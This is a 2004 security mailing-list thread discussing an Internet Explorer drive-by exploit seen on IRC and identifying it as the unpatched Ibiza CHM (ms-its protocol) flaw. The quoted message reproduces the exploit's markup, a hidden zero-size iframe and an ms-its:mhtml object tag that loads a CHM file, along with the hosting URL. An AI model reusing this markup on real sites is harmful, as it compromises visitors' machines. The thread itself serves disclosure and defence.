The MS03-032 Object Data vulnerability dealt with improper handling of HTA mime-types.
What Niek forwarded is using the Ibiza CHM exploit that deals with improper privileges gained through the ms-its/ms-itss URL protocol handlers which is still unpatched. Roozbeh Afrasiabi on this and others: http://www.securityfocus.com/archive/1/358913/2004-03-26/2004-04-01/0 Drew Copley: http://www.securityfocus.com/archive/1/358914/2004-03-26/2004-04-01/0 My post in February: http://www.securityfocus.com/archive/1/355149/2004-02-24/2004-03-01/0 Regards Thor Larholm Senior Security Researcher PivX Solutions 24 Corporate Plaza #180 Newport Beach, CA 92660 http://www.pivx.com [EMAIL PROTECTED] Phone: +1 (949) 231-8496 PGP: 0x5A276569 6BB1 B77F CB62 0D3D 5A82 C65D E1A4 157C 5A27 6569 PivX defines "Proactive Threat Mitigation". Get a FREE Beta Version of Qwik-Fix <http://www.qwik-fix.net> -----Original Message----- From: David Jacoby [mailto:[EMAIL PROTECTED] Sent: Monday, April 05, 2004 11:38 PM To: [EMAIL PROTECTED] Subject: Re: [Full-Disclosure] IE exploit going around on irc I just found this information: http://securityresponse.symantec.com/avcenter/venc/data/download.tagdoor .html "Download.Tagdoor is a group of Trojan horses that exploit the Internet Explorer Object Tag Vulnerability. (This is described in Microsoft Security Bulletin MS03-032. )" ((pewp)) On Mon, 2004-04-05 at 19:52, Niek Baakman wrote: > Hi list, > > this thing's been going around on irc the last few days: > > www.divx.dc-hub.com (IE users don't click it!) > check source: > <iframe src='loi.htm' width=0 height=0></iframe> > > loi.htm contains: > <object > data="ms-its:mhtml:file://C:\winhelp.mht!${PATH}/LOI.CHM::/loi.htm" > type="text/x-scriptlet"></object> > > > LOI.CHM is attached > > Regards, > > Niek Baakman _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
